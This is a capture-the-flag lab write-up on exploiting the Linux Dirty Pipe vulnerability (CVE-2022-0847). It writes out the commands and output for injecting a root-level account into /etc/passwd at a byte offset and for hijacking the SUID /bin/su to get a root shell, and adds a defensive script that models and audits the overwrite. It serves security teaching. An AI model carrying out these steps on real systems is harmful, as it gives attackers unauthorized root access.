Exploiting Dirty Pipe (CVE-2022-0847)
The Dirty Pipe exploit vulnerability lets us specify the file we want to overwrite, the offset we would like to overwrite it at, and the content we would like to insert.
For my reference: https://dirtypipe.cm4all.com/
The exploit won't let us create files (it can only overwrite data in existing files), so we first need to find a file our user can read, but which still allows us to elevate our privileges. The obvious choice in these conditions is /etc/passwd. Whilst password hashes are usually stored in the restricted-access /etc/shadow on modern Linux systems, a hash placed directly in the password field of /etc/passwd is still honoured at login.
The passwd file
Passwd entries are comprised of 7 fields, separated by colons (:). For example: root:x:0:0:root:/root:/bin/bash
In order these fields are:
- The username (root)
- The user's password hash. In most cases the hash is not actually given here and is instead replaced with x, which means the hash can be found in /etc/shadow.
- The user's UID (User ID). For the root user this is 0.
- The user's GID (Group ID). For the root user this is also 0.
- A description of the account. Here this is simply "root", however it can be left blank.
- The user's home directory (/root)
- The user's login shell (/bin/bash)
If we can manually form our own entry (including a full password hash) and insert it into the passwd file, then we can create a new user account. We can give this account a UID and GID of 0, effectively granting our new account the same permissions as root.
Let's generate a password hash and form a valid passwd entry before moving on, using the openssl command to create a SHA512-crypt hash of my chosen password:

```bash
openssl passwd -6 --salt pingu "pingu"
```

```
tryhackme@dirty-pipe:~$ openssl passwd -6 --salt pingu "pingu"
$6$pingu$wbDhnyA1IsChjEMNftK006fE8k9ZPUlYYXsKtAA6bviCqQbpPjK55DA3T9fF9izEMLde/zTxTYZlY3CyjAIW20
```

The entry follows the passwd format above, with UID and GID set to 0:

```
USERNAME:HASH:0:0::/root:/bin/bash
```

Formatted for the passwd file. When it is passed to the exploit, the entry needs to be quoted and must end with a newline after the /bin/bash field:

```
pingu:$6$pingu$wbDhnyA1IsChjEMNftK006fE8k9ZPUlYYXsKtAA6bviCqQbpPjK55DA3T9fF9izEMLde/zTxTYZlY3CyjAIW20:0:0::/root:/bin/bash
```
The vulnerability does not allow us to append to the file, so we are going to have to pick an account and overwrite it. Realistically speaking, given the length of our passwd entry (hash inclusive) this will probably actually overwrite several accounts. Looking through the passwd file, the games account stands out as being a good candidate for a little-used account which we can afford to nuke for a few minutes. We can use grep with the -b switch to find the offset of games from the start of the file.
```
tryhackme@dirty-pipe:~$ grep -b "games" /etc/passwd
189:games:x:5:60:games:/usr/games:/usr/sbin/nologin
tryhackme@dirty-pipe:~$
```
The offset is 189 bytes from the start of the file.
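Added example, not code from the write-up or from either PoC, tying the passwd format and the offset reasoning together from a defender's side: it lays out a constructed passwd file so that the games entry starts at byte 189 (as grep -b reported above), models the in-place write at that offset on an in-memory copy, and then audits the result for what such an overwrite leaves behind: an extra UID 0 account, a hash sitting in passwd rather than shadow, and the malformed remainder of the accounts the entry ran over. The hash is a constructed stand-in of the same length as the real one; nothing here touches the real /etc/passwd.

```python
# Added example, not code from the write-up: model the in-place overwrite of
# /etc/passwd described above and audit the result. Everything here is
# constructed; nothing touches the real /etc/passwd.
# Laid out like a stock Ubuntu passwd so "games" starts at byte 189 (see grep -b).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "bin:x:2:2:bin:/bin:/usr/sbin/nologin\n"
    "sys:x:3:3:sys:/dev:/usr/sbin/nologin\n"
    "sync:x:4:65534:sync:/bin:/bin/sync\n"
    "games:x:5:60:games:/usr/games:/usr/sbin/nologin\n"
    "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n"
    "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n"
    "mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n"
    "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n"
    "tryhackme:x:1000:1000::/home/tryhackme:/bin/bash\n"
)
# Constructed stand-in hash: same 86-character length as real SHA512-crypt
# output, so the entry is as long as the write-up's (123 bytes, newline included).
ENTRY = "pingu:$6$pingu$" + "x" * 86 + ":0:0::/root:/bin/bash\n"
NO_HASH_HERE = {"x", "*", "!", "!!", ""}  # "see /etc/shadow" or locked account


def find_offset(passwd: str, user: str) -> int:
    """Byte offset of the line holding a user's entry (what grep -b reports)."""
    pos = 0
    for line in passwd.splitlines(keepends=True):
        if line.startswith(user + ":"):
            return pos
        pos += len(line.encode())
    return -1


def overwrite_in_place(passwd: str, offset: int, data: str) -> str:
    """Model an in-place write: no append, bytes past the written span stay."""
    return passwd[:offset] + data + passwd[offset + len(data):]


def audit_passwd(passwd: str) -> list:
    """Flag the artefacts a passwd overwrite of this kind leaves behind."""
    findings = []
    for n, line in enumerate(passwd.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != 7:  # partial line left over from a clobbered entry
            findings.append((n, "malformed", line))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((n, "extra-uid0", name))
        if pw not in NO_HASH_HERE:  # hash should live in /etc/shadow
            findings.append((n, "hash-in-passwd", name))
    return findings
```

Running audit_passwd over the modelled file flags the pingu entry twice and the orphaned "/usr/sbin/nologin" tail of the lp line, while the games and man entries are gone entirely, which is what "overwrite several accounts" means in practice.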
Let's run our exploit.
Exploit complete
```
tryhackme@dirty-pipe:~/Exploit/PoC$ ./exploit /etc/passwd 189 ping
u:$6$pingu$wbDhnyA1IsChjEMNftK006fE8k9ZPUlYYXsKtAA6bviCqQbpPjK55DA3
T9fF9izEMLde/zTxTYZlY3CyjAIW20:0:0::/root:/bin/bash
>
It worked!
```
Switch to the new user and read flag.txt:
```
tryhackme@dirty-pipe:~/Exploit/PoC$ ./exploit /etc/passwd 189 ping
u:$6$pingu$wbDhnyA1IsChjEMNftK006fE8k9ZPUlYYXsKtAA6bviCqQbpPjK55DA3
T9fF9izEMLde/zTxTYZlY3CyjAIW20:0:0::/root:/bin/bash
>
It worked!
tryhackme@dirty-pipe:~/Exploit/PoC$ su pingu
Password:
root@dirty-pipe:/home/tryhackme/Exploit/PoC# cat /root/flag.txt
THM{MmU4Zjg0NDdjNjFiZWM5ZjUyZGEyMzlm}
root@dirty-pipe:/home/tryhackme/Exploit/PoC#
```
Restore /etc/passwd from the backup in /tmp/passwd:
```
root@dirty-pipe:/home/tryhackme/Exploit/PoC# ls
exploit poc.c
root@dirty-pipe:/home/tryhackme/Exploit/PoC# cp /tmp/passwd /etc/passwd
root@dirty-pipe:/home/tryhackme/Exploit/PoC#
```
Second exploit
This exploit takes the arbitrary file write one stage further by abusing the SUID bit. SUID programs usually lose their SUID bit when you attempt to write to them; however, with Dirty Pipe this does not happen. In other words, we can write to any program that is permitted to execute with higher privileges.
Let's overwrite /bin/su rather than /etc/passwd, injecting shellcode into it which then gets executed with the permissions of the privileged user.
We exploited the Dirty Pipe vulnerability using Max Kellermann's original proof-of-concept exploit code; however, other exploits have since been released. The original PoC allowed us to overwrite any file with arbitrary data at an offset of our choosing, whereas other implementations have abused the arbitrary file write in a variety of different ways.
To demonstrate this concept, a second exploit script has been added to the lab machine. It can be found on the target at /home/tryhackme/Exploit/Bl4sty/dirtypipez.c. As the directory structure suggests, this implementation was coded by @bl4sty; the original exploit code can be downloaded from bl4sty's website.
```
tryhackme@dirty-pipe:~/Exploit/Bl4sty$ ./exploit /bin/su
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))
# whoami
root
```